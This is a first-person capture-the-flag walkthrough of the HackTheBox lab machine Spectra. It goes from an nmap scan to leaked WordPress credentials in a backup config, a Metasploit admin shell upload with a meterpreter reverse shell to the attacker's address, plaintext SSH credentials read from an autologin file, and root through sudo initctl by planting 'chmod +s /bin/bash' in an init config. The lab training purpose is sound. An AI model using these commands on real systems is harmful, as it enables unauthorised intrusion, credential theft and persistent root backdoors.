Spectra HackTheBox WalkThrough
This is Spectra HackTheBox machine walkthrough. In this writeup I have demonstrated step-by-step how I rooted to Spectra HTB
machine. Before starting let us know something about this machine. It is a Linux OS
box (which I came to know after rooting) with IP address 10.10.10.229
and difficulty easy
assigned by its maker.
Also, connect your PC with HackTheBox VPN
and make sure your connectivity with Spectra
machine by pinging its IP 10.10.10.229. If all goes correct then start hacking. As usual, I started by scanning the machine. Used Nmap (port scanner) for this task and the result is below:-
Scanning
$ sudo nmap -sT -sV -p- -O -oA nmap/all-tcp-ports 10.10.10.229
Full TCP scan with Nmap found ports 22
, 80
and 3306
as open. OpenSSH
Server on port 22
, Nginx
Web Server on port 80
and MySQL
Database Server on port 3306
is running. OpenSSH 8.1
is not affected with any serious vulnerability so I left it for enumeration later when I would get some credentials. Since Web Server is running on port 80 so there should be some website hosted over it and it can be accessed at URL http://10.10.10.229.
After going to this URL found a simple HTML web page
and some links namely Software Issue Tracker
and Test
. Both these links revealed a Virtual Host spectra.htb
. So before accessing them let us add spectra.htb
to our hosts
file. hosts file is present in the directory /etc/
.
Host File After Modification
$ cat /etc/hosts
After going to URL http://spectra.htb/main/ found that WordPress
is installed in /main
folder with its default theme. Then I pressed CTRL+U
to check the source-code
of this page. After checking the source-code found its version as 5.4.2
A quick google search revealed that this version in not affected with any serious vulnerability that would help us in further enumeration. After going to URL http://spectra.htb/testing/index.php found another instance of WordPress installed there and there is some database connectivity issue
due to which it is not showing home page. But there is directory listing
enabled
and you can check all its files through the URL http://spectra.htb/testing.
After some initial enumeration got file wp-config.php.save
. It contains some credentials. You can only see its content when you see its page-source
. Here is the URL of page
view-source:http://spectra.htb/testing/wp-config.php.save
From above extracted credential is
DB_USER: devtest
DB_PASSWORD: devteam01
When I tried to login at http://spectra.htb/main/wp-login.php with creds devtest
: devteam01
it says wrong credential. But when I tried to use the credential administrator
: devteam01
, it logged in successfully. I think this is the reason that database connectivity issue is present at http://spectra.htb/testing/. devtest
should be replaced with administrator
in above config file for proper connectivity. Anyway, let us get user shell using this creds.
There are multiple ways by which you can get user shell when you get WordPress login credentials. The ways are
1. Upload Shell through Add Theme option.
2. Upload Shell through Add Plugins option.
3. Shell upload into 404.php file of theme.
4. Using pre-installed Plugins into header.php
5. Use metasploit module exploit/unix/webapp/wp_admin_shell_upload
to upload and get shell.
I am going to use 5th way that is using metasploit. To get user shell follow the given steps.
Getting User Shell
msf6 > search wp_admin
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS spectra.htb
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 10.10.14.57
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME administrator
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD devteam01
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /main/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit
meterpreter > sysinfo
meterpreter > getuid
We have successfully got user shell with user privilege nginx
. Let us upgrade it to fully qualified Linux shell so that we can run more advanced Linux command through it.
Upgrading Shell
meterpreter > shell
~export PATH
~export TERM=xterm
~python3 -c 'import pty;pty.spawn("/bin/bash")'
We have successfully upgraded the shell. When I tried to capture user flag from /home/katie/
it gave me access denied permission because user nginx don’t have permission to access user.txt
file. We have to find credential of user katie by which we can upgrade this shell to Katie’s privilege shell.
After some enumeration found file autologin.conf.orig
in /opt/
directory. This file contains the path of passwd file which contains actual credential. The complete path is /etc/autologin/passwd
.
$ cat /opt/autologin.conf.orig
$ cat /etc/autologin/passwd
passwd file has some credential. When I tried to use it with the katie SSH cred it worked. So we have SSH credential of user katie.
katie
: SummerHereWeCome!!
Let us login into katie’s account and capture user flag.
Login Into Katie’s Account
$ ssh [email protected]
~SummerHereWeCome!!
$ whoami && id
We have successfully logged in as katie. Let us capture user flag.
Capture User Flag
$ cat user.txt
Privilege Escalation
To escalate privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ sudo -l
command revealed that user katie can run $initctl
command as root user privilege.
This can be our Potential PrivEsc Vector. When I tried to get root shell by exploiting this excess right given to user katie I could get root shell easily. So here our potential privilege escalation vector is getting root by Sudo Right Exploitation
.
Let us understand how it works. So $initctl
is a tool that is used to start and stop init daemon
(server) or we can say it controls all init daemons running in the system. Check this link for more info. All init daemons’ configuration files
are present inside directory /etc/init/
. If we can anyhow change any of these configuration files then we can start its init daemon using $initctl
command for executing this config file. Since $initctl
command is executed by root privilege therefore our code inside this configuration file will also be executed as root and we would get root shell.
So to get root shell I have modified an init daemon configuration file test.conf
inside the the directory /etc/init/
since other users can read/write this file. I have replaced content inside script
& end script
with my shell code.
scriptchmod +s /bin/bashend script
After making changes save the file and start the daemon using $sudo
command as given below and follow the below steps. Do this process as soon as possible because content of modified file will be replaced with the previous file content. If all goes correct you will definitely upgrade your shell to root shell.
Getting Root Shell
$ sudo -l
$ ls -la /etc/init | grep test
$ vi /etc/init/test.conf
$ cat /etc/init/test.conf
$ sudo /sbin/initctl start test
$ /bin/bash -p
# whoami && id
We are root now. Let us capture root flag.
Capture Root Flag
# cat /root/root.txt
This was how I rooted Spectra HackTheBox machine. Learnt a lot after this challenge, hope you have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion related to walkthrough feel free to write us at [email protected].